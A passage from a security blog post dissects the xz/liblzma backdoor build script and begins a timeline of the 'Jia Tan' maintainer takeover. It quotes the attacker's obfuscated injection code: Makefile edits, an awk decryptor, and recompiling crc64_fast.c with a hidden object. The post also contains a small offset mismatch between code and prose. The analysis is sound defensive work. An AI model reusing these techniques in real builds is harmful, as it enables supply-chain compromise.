More added lines. It’s worth stopping for a moment to look at what’s happened so far. The script has added these lines to <code>src/liblzma/Makefile</code>: <pre>am__test = bad-3-corrupt_lzma2.xz am__strip_prefix = tr "\\t \\-_" " \\t_\\-" am__dist_setup = $(am_strip_prefix) | xz -d 2&gt;/dev/null | $(SHELL) am__test_dir = $(top_srcdir)/tests/files/$(am__test) </pre> <p> <br> These look plausible but fall apart under closer examination: for example, <code>am__test_dir</code> is a file, not a directory. The goal here seems to be that after <code>configure</code> has run, the generated <code>Makefile</code> still looks plausibly inscrutable. And the lines have been added in scattered places throughout the <code>Makefile</code>; no one will see them all next to each other like in this display. Back to the script: <pre>h="-Wl,--sort-section=name,-X" if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" &gt; /dev/null 2&gt;&amp;1;then h=$h",-z,now" fi j="liblzma_la_LDFLAGS += $h" sed -i "/$L/i$j" src/liblzma/Makefile || true </pre> <p> <br> Add <code>liblzma_la_LDFLAGS += -Wl,--sort-section=name,-X</code> to the Makefile. If the <code>LDFLAGS</code> do not already say <code>-z,now</code> or <code>-Wl,now</code>, add <code>-z,now</code>. <p> The “<code>-Wl,now</code>” forces <code>LD_BIND_NOW</code> behavior, in which the dynamic loader resolves all symbols at program startup time. One reason this is normally done is for security: it makes sure that the global offset table and procedure linkage tables can be marked read-only early in process startup, so that buffer overflows or write-after-free bugs cannot target those tables. However, it also has the effect of running GNU indirect function (ifunc) resolvers at startup during that resolution process, and the backdoor arranges to be called from one of those. This early invocation of the backdoor setup lets it run while the tables are still writable, allowing the backdoor to replace the entry for <code>RSA_public_decrypt</code> with its own version. But we are getting ahead of ourselves. Back to the script: <pre>sed -i "s/$O/$C/g" libtool || true </pre> <p> We checked earlier that the libtool file said <code>pic_flag=" -fPIC -DPIC"</code>. The sed command changes it to read <code>pic_flag=" -fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"</code>. <p> It is not clear why these additional flags are important, but in general they disable linker optimizations that could plausibly get in the way of subterfuge. <pre>k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))" sed -i "s/$u/$k/" src/liblzma/Makefile || true l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\ export top_srcdir='\$(top_srcdir)'; \\\\\n\ export CC='\$(CC)'; \\\\\n\ export DEFS='\$(DEFS)'; \\\\\n\ export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\ export INCLUDES='\$(INCLUDES)'; \\\\\n\ export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\ export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\ export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\ export CFLAGS='\$(CFLAGS)'; \\\\\n\ export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\ export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\ export libdir='\$(libdir)'; \\\\\n\ export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\ export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\ sed rpath \$(am__test_dir) | \$(am__dist_setup) &gt;/dev/null 2&gt;&amp;1"; sed -i "/$m/i$l" src/liblzma/Makefile || true eval $zrKcHD </pre> <p> Shell quoting continues to be trippy, but we’ve reached the final change. This adds the line <pre>AM_V_CCLD = @echo -n $(LTDEPS); $(am__v_CCLD_$(V)) </pre> <p> to one place in the Makefile, and then adds a long script that sets up some variables, entirely as misdirection, that ends with <pre>sed rpath $(am__test_dir) | $(am__dist_setup) &gt;/dev/null 2&gt;&amp;1 </pre> <p> The <code>sed rpath</code> command is just as much an obfuscated <code>cat</code> as <code>sed "r\n"</code> was, but <code>-rpath</code> is a very common linker flag, so at first glance you might not notice it’s next to the wrong command. Recalling the <code>am__test</code> and related lines added above, this pipeline ends up being equivalent to: <pre>cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d | /bin/sh </pre> <p> Our old friend! We know what this does, though. It runs the very script we are currently reading in this post. <a href="https://research.swtch.com/zip">How recursive!</a> <a class=anchor href="#make"><h2 id="make">Make</h2></a> <p> Instead of running during <code>configure</code> in the tarball root directory, let’s mentally re-execute the script as it would run during <code>make</code> in the <code>liblzma</code> directory. In that context, the variables at the top have been set, but all the editing we just considered was skipped over by “if #1” not finding <code>./config.status</code>. Now let’s keep executing the script. <pre>fi </pre> <p> That <code>fi</code> closes “if #2”, which checked for a Debian or RPM build. The upcoming <code>elif</code> continues “if #1”, which checked for config.status, meaning now we are executing the part of the script that matters when run during <code>make</code> in the <code>liblzma</code> directory: <pre>elif (test -f .libs/liblzma_la-crc64_fast.o) &amp;&amp; (test -f .libs/liblzma_la-crc32_fast.o); then </pre> <p> If we see the built objects for the crc code, we are running as part of <code>make</code>. Run the following code. <pre># Entirely new in 5.6.1 vs=`grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2&gt;/dev/null` if test "x$vs" != "x" &gt; /dev/null 2&gt;&amp;1;then f1=`echo $vs | cut -d: -f1` if test "x$f1" != "x" &gt; /dev/null 2&gt;&amp;1;then start=`expr $(echo $vs | cut -d: -f2) + 7` ve=`grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2&gt;/dev/null` if test "x$ve" != "x" &gt; /dev/null 2&gt;&amp;1;then f2=`echo $ve | cut -d: -f1` if test "x$f2" != "x" &gt; /dev/null 2&gt;&amp;1;then [ ! "x$f2" = "x$f1" ] &amp;&amp; exit 0 [ ! -f $f1 ] &amp;&amp; exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start` eval `cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc` fi fi fi fi </pre> <p> We start this section with another extension hook. This time the magic strings are <code>'jV!.^%'</code> and <code>'%.R.1Z'</code>. As before, there are no test files with these strings. This was for future extensibility. <p> On to the code shared with 5.6.0: <pre>eval $zrKcKQ if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then exit 0 fi if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then exit 0 fi if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then exit 0 fi if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then exit 0 fi </pre> <p> Check that the ifunc-enabled CRC source files look right. Interestingly, Lasse Collin renamed <code>crc_clmul.c</code> to <code>crc_x86_clmul.h</code> <a href="https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea">on 2024-01-11</a>. One has to assume that the person or team behind “Jia Tan” had been working on all this code well before then and that the first version checked <code>crc_clmul.c</code>. They were probably very annoyed when Lasse Collin accidentally broke their in-development backdoor by cleaning up the file names! <pre>if ! grep -qs "$C" ../../libtool; then exit 0 fi if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Check that the build configuration has the extra flags we added before. <pre>if echo $liblzma_la_LINK | grep -qs -e "lazy" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Check that no one has added <code>lazy</code> to the linker options, which might override the <code>-Wl,now</code>. (This code really needs to run before the tables it patches get marked read-only!) <pre>N=0 W=0 Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4` eval $zrKcjv if test -z "$Y"; then N=0 W=88664 else N=88664 W=0 fi </pre> <p> This is selecting between two different offset values depending on the content of <code>gettext.m4</code>. The distributed xz tarballs do not contain that string in <code>gettext.m4</code> (it does appear in <code>build-to-host.m4</code>), so the <code>grep</code> finds nothing, <code>$Y</code> is the empty string, and the true case of the <code>if</code> executes: <code>N=0</code> and <code>W=88792</code>. <pre>xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | </pre> <p> I inserted a line break here. Remember the “corrupt” test file script set <code>i</code> to the large head pipeline? It’s still set here, being used inside the script extracted from that pipeline. Before, the pipeline extracted 33,707 bytes and then we used the final 31,233 bytes. Now we are using the entire thing, which probably means just the prefix that we skipped before. The sed command is inserting a newline after every byte of that output, setting up for piping into the remainder of the command line: <pre>LC_ALL=C awk ' BEGIN{ FS="\n";RS="\n";ORS="";m=256; for(i=0;i&lt;m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;} i=0;j=0;for(l=0;l&lt;8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;} } { v=t["x" (NF&lt;1?RS:$1)]; i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m]; printf "%c",(v+k)%m }' | </pre> <p> I inserted another line break here. What is this? <a href="https://twitter.com/nugxperience/status/1773906926503591970">@nugxperience on Twitter recognized it</a> as an RC4-like decryption function, implemented in awk! Apparently the <code>tr</code>-based substitution cipher wasn’t secure enough for this step. This is the 5.6.1 version; the 5.6.0 version is the same except that the second loop counts to 4096 instead of 8192. <p> Back to the script: <pre>xz -dc --single-stream | ((head -c +$N &gt; /dev/null 2&gt;&amp;1) &amp;&amp; head -c +$W) &gt; liblzma_la-crc64-fast.o || true </pre> <p> We finally made it to the end of this long line. The decrypted output is piped through xz to decompress it; the <code>--single-stream</code> flag says to stop at the end of the first xz EOF marker instead of looking for additional files on standard input. This avoids reading the section of the input that we extracted with the <code>tail</code> command before. Then the decompressed data is piped through a <code>head</code> pair that extracts either the full 88,792 byte input or zero bytes, depending on <code>gettext.m4</code> from before, and writes it to <code>liblzma_la-crc64-fast.o</code>. In our build, we are taking the full input. <pre>if ! test -f liblzma_la-crc64-fast.o; then exit 0 fi </pre> <p> If all that failed, stop quietly. <pre>cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true </pre> <p> Wait what? Oh! Notice the two different file names <code>crc64_fast</code> versus <code>crc64-fast</code>. And neither of these is the one we just extracted. These are in <code>.libs/</code>, and the one we extracted is in the current directory. This is backing up the real file (the underscored one) into a file with a very similar name (the hyphenated one). <pre>V='#endif\n#if defined(CRC32_GENERIC) &amp;&amp; defined(CRC64_GENERIC) &amp;&amp; defined(CRC_X86_CLMUL) &amp;&amp; defined(CRC_USE_IFUNC) &amp;&amp; defined(PIC) &amp;&amp; (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\n extern int _get_cpuid(int, void*, void*, void*, void*, void*);\n static inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19); return success &amp;&amp; (r[2] &amp; ecx_mask) == ecx_mask; }\n #else\n #define _is_arch_extension_supported is_arch_extension_supported' </pre> <p> This string <code>$V</code> begins with “<code>#endif</code>”, which is never a good sign. Let’s move on for now, but we’ll take a closer look at that text shortly. <pre>eval $yosA if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \ sed "/include \"crc_x86_clmul.h\"/a \\$V" | \ sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2&gt;/dev/null | \ $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \ $CFLAGS -r liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la-crc64_fast.o 2&gt;/dev/null; then </pre> <p> This <code>if</code> statement is running a pipeline of sed commands piped into <code>$CC</code> with the arguments <code>liblzma_la-crc64-fast.o</code> (adding that object as an input to the compiler) and <code>-x</code> <code>c</code> <code>-</code> (compile a C program from standard input). That is, it rebuilds an edited copy of <code>crc64_fast.c</code> (a real xz source file) and merges the extracted malicious <code>.o</code> file into the resulting object, overwriting the underscored real object file that would have been built originally for <code>crc64_fast.c</code>. The <code>sed</code> <code>1i</code> tells the compiler the file name to record in debug info, since the compiler is reading standard input—very tidy! But what are the edits? <p> The file starts out looking like: <pre>... #if defined(CRC_X86_CLMUL) # define BUILDING_CRC64_CLMUL # include "crc_x86_clmul.h" #endif ... static crc64_func_type crc64_resolve(void) { return is_arch_extension_supported() ? &amp;crc64_arch_optimized : &amp;crc64_generic; } </pre> <p> The sed commands add an <code>_</code> prefix to the name of the function in the return condition, and then add <code>$V</code> after the <code>include</code> line, producing (with reformatting of the C code): <pre># 0 "path/to/src/liblzma/check/crc64_fast.c" ... #if defined(CRC_X86_CLMUL) # define BUILDING_CRC64_CLMUL # include "crc_x86_clmul.h" #endif #if defined(CRC32_GENERIC) &amp;&amp; defined(CRC64_GENERIC) &amp;&amp; \ defined(CRC_X86_CLMUL) &amp;&amp; defined(CRC_USE_IFUNC) &amp;&amp; defined(PIC) &amp;&amp; \ (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL)) extern int _get_cpuid(int, void*, void*, void*, void*, void*); static inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19); return success &amp;&amp; (r[2] &amp; ecx_mask) == ecx_mask; } #else #define _is_arch_extension_supported is_arch_extension_supported #endif ... static crc64_func_type crc64_resolve(void) { return _is_arch_extension_supported() ? &amp;crc64_arch_optimized : &amp;crc64_generic; } </pre> <p> That is, the crc64_resolve function, which is the ifunc resolver that gets run early in dynamic loading, before the GOT and PLT have been marked read-only, is now calling the newly inserted <code>_is_arch_extension_supported</code>, which calls <code>_get_cpuid</code>. This still looks like plausible code, since this is pretty similar to <a href="https://git.tukaani.org/?p=xz.git;a=blob;f=src/liblzma/check/crc_x86_clmul.h;h=ae66ca9f8c710fd84cd8b0e6e52e7bbfb7df8c0f;hb=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429#l388">the real is_arch_extension_supported</a>. But <code>_get_cpuid</code> is provided by the backdoor .o, and it does a lot more before returning the cpuid information. In particular it rewrites the GOT and PLT to hijack calls to RSA_public_decrypt. <p> But let’s get back to the shell script, which is still running from inside <code>src/liblzma/Makefile</code> and just successfully inserted the backdoor into <code>.libs/liblzma_la-crc64_fast.o</code>. We are now in the <code>if</code> compiler success case: <pre>cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true eval $BPep if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | \ sed "/include \"crc32_arm64.h\"/a \\$V" | \ sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2&gt;/dev/null | \ $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \ $CFLAGS -r -x c - $P -o .libs/liblzma_la-crc32_fast.o; then </pre> <p> This does the same thing for <code>crc32_fast.c</code>, except it doesn’t add the backdoored object code. We don’t want two copies of that in the build. It is unclear why the script bothers to intercept both the crc32 and crc64 ifuncs; either one should have sufficed. Perhaps they wanted the dispatch code for both to look similar in a debugger. Now we’re in the doubly nested <code>if</code> compiler success case: <pre>eval $RgYB if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then </pre> <p> If we can relink the .la file, then... <pre>if test ! -f .libs/liblzma.so; then mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> <br> If the relink succeeded but didn’t write the file, assume it failed and restore the backups. <pre>rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true </pre> <p> No matter what, remove the libraries. (The <code>Makefile</code> link step is presumably going to happen next and recreate them.) <pre>else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> This is the <code>else</code> for the link failing. Restore from backups. <pre>rm -f .libs/liblzma_la-crc32-fast.o || true rm -f .libs/liblzma_la-crc64-fast.o || true </pre> <p> Now we are in the inner compiler success case. Delete backups. <pre>else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> This is the else for the crc32 compilation failing. Restore from backups. <pre>else mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> This is the else for the crc64 compilation failing. Restore from backup. (This is not the cleanest shell script in the world!) <pre>rm -f liblzma_la-crc64-fast.o || true </pre> <p> Now we are at the end of the Makefile section of the script. Delete the backup. <pre>fi eval $DHLd $ </pre> <p> Close the “<code>elif</code> we’re in a Makefile”, one more extension point/debug print, and we’re done! The script has injected the object file into the objects built during <code>make</code>, leaving no trace behind. Timeline of the xz open source attack tag:research.swtch.com,2012:research.swtch.com/xz-timeline 2024-04-01T23:23:00-04:00 2024-04-03T09:25:00-04:00 A detailed timeline of the xz open source attack, from 2021 to 2024. <p> Over a period of over two years, an attacker using the name “Jia Tan” worked as a diligent, effective contributor to the xz compression library, eventually being granted commit access and maintainership. Using that access, they installed a very subtle, carefully hidden backdoor into liblzma, a part of xz that also happens to be a dependency of OpenSSH sshd on Debian, Ubuntu, and Fedora, and other systemd-based Linux systems that patched sshd to link libsystemd. (Note that this does not include systems like Arch Linux, Gentoo, and NixOS, which do not patch sshd.) That backdoor watches for the attacker sending hidden commands at the start of an SSH session, giving the attacker the ability to run an arbitrary command on the target system without logging in: unauthenticated, targeted remote code execution. <p> The attack was <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">publicly disclosed on March 29, 2024</a> and appears to be the first serious known supply chain attack on widely used open source software. It marks a watershed moment in open source supply chain security, for better or worse. <p> This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021. (See also my <a href="xz-script">analysis of the attack script</a>.) <p> Corrections or additions welcome on <a href="https://bsky.app/profile/swtch.com/post/3kp4my7wdom2q">Bluesky</a>, <a href="https://hachyderm.io/@rsc/112199506755478946">Mastodon</a>, or <a href="mailto:rsc@swtch.com">email</a>. <a class=anchor href="#prologue"><h2 id="prologue">Prologue</h2></a> <p> <b>2005–2008</b>: <a href="https://github.com/kobolabs/liblzma/blob/87b7682ce4b1c849504e2b3641cebaad62aaef87/doc/history.txt">Lasse Collin, with help from others</a>, designs the .xz file format using the LZMA compression algorithm, which compresses files to about 70% of what gzip did [1]. Over time this format becomes widely used for compressing tar files, Linux kernel images, and many other uses. <a class=anchor href="#jia_tan_arrives_on_scene_with_supporting_cast"><h2 id="jia_tan_arrives_on_scene_with_supporting_cast">Jia Tan arrives on scene, with supporting cast</h2></a> <p> <b>2021-10-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html">first, innocuous patch</a> to the xz-devel mailing list, adding “.editorconfig” file. <p> <b>2021-11-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00519.html">second innocuous patch</a> to the xz-devel mailing list, fixing an apparent reproducible build problem. More patches that seem (even in retrospect) to be fine follow. <p> <b>2022-02-07</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6468f7e41a8e9c611e4ba8d34e2175c5dacdbeb4">first commit with “jiat0218@gmail.com” as author in git metadata</a> (“liblzma: Add NULL checks to LZMA and LZMA2 properties encoders”). <p> <b>2022-04-19</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00553.html">yet another innocuous patch</a> to the xz-devel mailing list. <p> <b>2022-04-22</b>: “Jigar Kumar” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html">first of a few emails</a> complaining about Jia Tan’s patch not landing. (“Patches spend years on this mailing list. There is no reason to think anything is coming soon.”) At this point, Lasse Collin has already landed four of Jia Tan’s patches, marked by “Thanks to Jia Tan” in the commit message. <p> <b>2022-05-19</b>: “Dennis Ens” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html">mail to xz-devel</a> asking if XZ for Java is maintained. <p> <b>2022-05-19</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00563.html">replies</a> apologizing for slowness and adds “Jia Tan has helped me off-list with XZ Utils and he might have a bigger role in the future at least with XZ Utils. It’s clear that my resources are too limited (thus the many emails waiting for replies) so something has to change in the long term.” <p> <b>2022-05-27</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html">pressure email</a> to patch thread. “Over 1 month and no closer to being merged. Not a surprise.” <p> <b>2022-06-07</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html">pressure email</a> to Java thread. “Progress will not happen until there is new maintainer. XZ for C has sparse commit log too. Dennis you are better off waiting until new maintainer happens or fork yourself. Submitting patches here has no purpose these days. The current maintainer lost interest or doesn’t care to maintain anymore. It is sad to see for a repo like this.” <p> <b>2022-06-08</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html">pushes back</a>. “I haven’t lost interest but my ability to care has been fairly limited mostly due to longterm mental health issues but also due to some other things. Recently I’ve worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we’ll see. It’s also good to keep in mind that this is an unpaid hobby project.” <p> <b>2022-06-10</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=aa75c5563a760aea3aa23d997d519e702e82726b">first commit with “Jia Tan” as author in git metadata</a> (“Tests: Created tests for hardware functions”). Note also that there was one earlier commit on 2022-02-07 that had the full name set only to jiat75. <p> <b>2022-06-14</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=0354d6cce3ff98ea6f927107baf216253f6ce2bb">only commit with “jiat75@gmail.com” as author</a>. This could have been a temporary git misconfiguration on Jia Tan’s side forgetting their fake email address. <p> <b>2022-06-14</b>: Jugar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html">pressure email</a>. “With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code. You ignore the many patches bit rotting away on this mailing list. Right now you choke your repo. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?” <p> <b>2022-06-21</b>: Dennis Ens sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html">pressure email</a>. “I am sorry about your mental health issues, but its important to be aware of your own limits. I get that this is a hobby project for all contributors, but the community desires more. Why not pass on maintainership for XZ for C so you can give XZ for Java more attention? Or pass on XZ for Java to someone else to focus on XZ for C? Trying to maintain both means that neither are maintained well.” <p> <b>2022-06-22</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html">pressure email</a> to C patch thread. “Is there any progress on this? Jia I see you have recent commits. Why can’t you commit this yourself?” <p> <b>2022-06-29</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00571.html">replies</a>: “As I have hinted in earlier emails, Jia Tan may have a bigger role in the project in the future. He has been helping a lot off-list and is practically a co-maintainer already. :-) I know that not much has happened in the git repository yet but things happen in small steps. In any case some change in maintainership is already in progress at least for XZ Utils.” <a class=anchor href="#jia_tan_becomes_maintainer"><h2 id="jia_tan_becomes_maintainer">Jia Tan becomes maintainer</h2></a> <p> At this point Lasse seems to have started working even more closely with Jia Tan. Brian Krebs <a href="https://infosec.exchange/@briankrebs/112197305365490518">observes</a> that many of these email addresses never appeared elsewhere on the internet, even in data breaches (nor again in xz-devel). It seems likely that they were fakes created to push Lasse to give Jia more control. It worked. Over the next few months, Jia started replying to threads on xz-devel authoritatively about the upcoming 5.4.0 release. <p> <b>2022-09-27</b>: Jia Tan gives <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00593.html">release summary</a> for 5.4.0. (“The 5.4.0 release that will contain the multi threaded decoder is planned for December. The list of open issues related to 5..4.0 [sic] in general that I am tracking are...”) <p> <b>2022-10-28</b>: Jia Tan <a href="https://github.com/JiaT75?tab=overview&from=2022-10-01&to=2022-10-31">added to the Tukaani organization</a> on GitHub. Being an organization member does not imply any special access, but it is a necessary step before granting maintainer access. <p> <b>2022-11-30</b>: Lasse Collin <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=764955e2d4f2a5e8d6d6fec63af694f799e050e7">changes bug report email</a> from his personal address to an alias that goes to him and Jia Tan, notes in README that “the project maintainers Lasse Collin and Jia Tan can be reached via <a href="mailto:xz@tukaani.org">xz@tukaani.org</a>”. <p> <b>2022-12-30</b>: Jia Tan merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=8ace358d65059152d9a1f43f4770170d29d35754">a batch of commits directly into the xz repo</a> (“CMake: Update .gitignore for CMake artifacts from in source build”). At this point we know they have commit access. Interestingly, a <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=799ead162de63b8400733603d3abcd2e1977bdca">few commits later</a> in the same batch is the only commit with a different full name: “Jia Cheong Tan”. <p> <b>2023-01-11</b>: Lasse Collin <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=18b845e69752c975dfeda418ec00eda22605c2ee">tags and builds his final release</a>, v5.4.1. <p> <b>2023-03-18</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6ca8046ecbc7a1c81ee08f544bfd1414819fb2e8">tags and builds their first release</a>, v5.4.2. <p> <b>2023-03-20</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/6403e93344476972e908ce17e8244f5c2b957dfd">updates Google oss-fuzz configuration</a> to send bugs to them. <p> <b>2023-06-22</b>: Hans Jansen sends <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=23b5c36fb71904bfbe16bb20f976da38dadf6c3b">a pair</a> of <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=b72d21202402a603db6d512fb9271cfa83249639">patches</a>, merged by Lasse Collin, that use the “<a href="https://maskray.me/blog/2021-01-18-gnu-indirect-function">GNU indirect function</a>” feature to select a fast CRC function at startup time. The final commit is <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=ee44863ae88e377a5df10db007ba9bfadde3d314">reworked by Lasse Collin</a> and merged by Jia Tan. This change is important because it provides a hook by which the backdoor code can modify the global function tables before they are remapped read-only. While this change could be an innocent performance optimization by itself, Hans Jansen returns in 2024 to promote the backdoored xz and otherwise does not exist on the internet. <p> <b>2023-07-07</b>: Jia Tan <a href="https://github.com/google/oss-fuzz/commit/d2e42b2e489eac6fe6268e381b7db151f4c892c5">disables ifunc support during oss-fuzz builds</a>, claiming ifunc is incompatible with address sanitizer. This may well be innocuous on its own, although it is also more groundwork for using ifunc later. <p> <b>2024-01-19</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=c26812c5b2c8a2a47f43214afe6b0b840c73e4f5">moves web site to GitHub pages</a>, giving them control over the XZ Utils web page. Lasse Collin presumably created the DNS records for the xz.tukaani.org subdomain that points to GitHub pages. After the attack was discovered, Lasse Collin deleted this DNS record to move back to <a href="https://tukaani.org">tukaani.org</a>, which he controls. <a class=anchor href="#attack_begins"><h2 id="attack_begins">Attack begins</h2></a> <p> <b>2024-02-23</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0">merges hidden backdoor binary code</a> well hidden inside some binary test input files. The README already said (from long before Jia Tan showed up) “This directory contains bunch of files to test handling of .xz, .lzma (LZMA_Alone), and .lz (lzip) files in decoder implementations. Many of the files have been created by hand with a hex editor, thus there is no better “source code” than the files themselves.” Having these kinds of test files is very common for this kind of library. Jia Tan took advantage of this to add a few files that wouldn’t be carefully reviewed. <p> <b>2024-02-24</b>: Jia Tan <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429">tags and builds v5.6.0</a> and publishes an xz-5.6.0.tar.gz distribution with an extra, malicious build-to-host.m4 that adds the backdoor when building a deb/rpm package. This m4 file is not present in the source repository, but many other legitimate ones are added during package as well, so it’s not suspicious by itself. But the script has been modified from the usual copy to add the backdoor. See my <a href="xz-script">xz attack shell script walkthrough post</a> for more. <p> <b>2024-02-24</b>: Gentoo <a href="https://bugs.gentoo.org/925415">starts seeing crashes in 5.6.0</a>. This seems to be an actual ifunc bug, rather than a bug in the hidden backdoor, since this is the first xz with Hans Jansen’s ifunc changes, and Gentoo does not patch sshd to use libsystemd, so it doesn’t have the backdoor. <p> <b>2024-02-26</b>: Debian <a href="https://tracker.debian.org/news/1506761/accepted-xz-utils-560-01-source-into-unstable/">adds xz-utils 5.6.0-0.1</a> to unstable. <p> <b>2024-02-27</b>: Jia Tan starts emailing Richard W.M. Jones to update Fedora 40 (privately confirmed by Rich Jones). <p> <b>2024-02-28</b>: Debian <a href="https://tracker.debian.org/news/1507917/accepted-xz-utils-560-02-source-into-unstable/">adds xz-utils 5.6.0-0.2</a> to unstable. <p> <b>2024-02-28</b>: Jia Tan <a 